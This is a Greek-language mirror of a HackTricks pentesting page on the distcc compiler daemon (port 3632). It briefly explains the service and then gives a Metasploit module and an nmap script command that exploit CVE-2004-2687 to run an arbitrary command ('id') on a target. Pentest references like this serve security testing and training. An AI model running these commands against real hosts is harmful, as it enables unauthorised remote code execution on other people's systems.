mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 06:30:37 +00:00
3.2 KiB
3.2 KiB
Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (Ειδικός Red Team AWS του HackTricks)!
Άλλοι τρόποι υποστήριξης του HackTricks:
- Αν θέλετε να δείτε την εταιρεία σας διαφημισμένη στο HackTricks ή να κατεβάσετε το HackTricks σε μορφή PDF ελέγξτε τα ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ!
- Αποκτήστε το επίσημο PEASS & HackTricks swag
- Ανακαλύψτε την Οικογένεια PEASS, τη συλλογή μας από αποκλειστικά NFTs
- Εγγραφείτε στη 💬 ομάδα Discord ή στη ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @carlospolopm.
- Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα HackTricks και HackTricks Cloud αποθετήρια του github.
Βασικές Πληροφορίες
Το Distcc είναι ένα εργαλείο που βελτιώνει τη διαδικασία συλλογής χρησιμοποιώντας τη ανενεργή επεξεργαστική ισχύ άλλων υπολογιστών στο δίκτυο. Όταν το distcc είναι εγκατεστημένο σε μια μηχανή, αυτή η μηχανή είναι ικανή να διανέμει τις εργασίες συλλογής σε ένα άλλο σύστημα. Αυτό το σύστημα παραλήπτης πρέπει να εκτελεί το δαίμονα distccd και πρέπει να έχει εγκατεστημένο έναν συμβατό μεταγλωττιστή για να επεξεργαστεί τον απεσταλμένο κώδικα.
Προεπιλεγμένη θύρα: 3632
PORT STATE SERVICE
3632/tcp open distccd
Εκμετάλλευση
Ελέγξτε αν είναι ευάλωτο στο CVE-2004-2687 για να εκτελέσετε τυχαίο κώδικα:
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
Shodan
Δεν νομίζω ότι το shodan ανιχνεύει αυτήν την υπηρεσία.
Πόροι
- https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
- https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Δημοσίευση δημιουργημένη από Álex B (@r1p)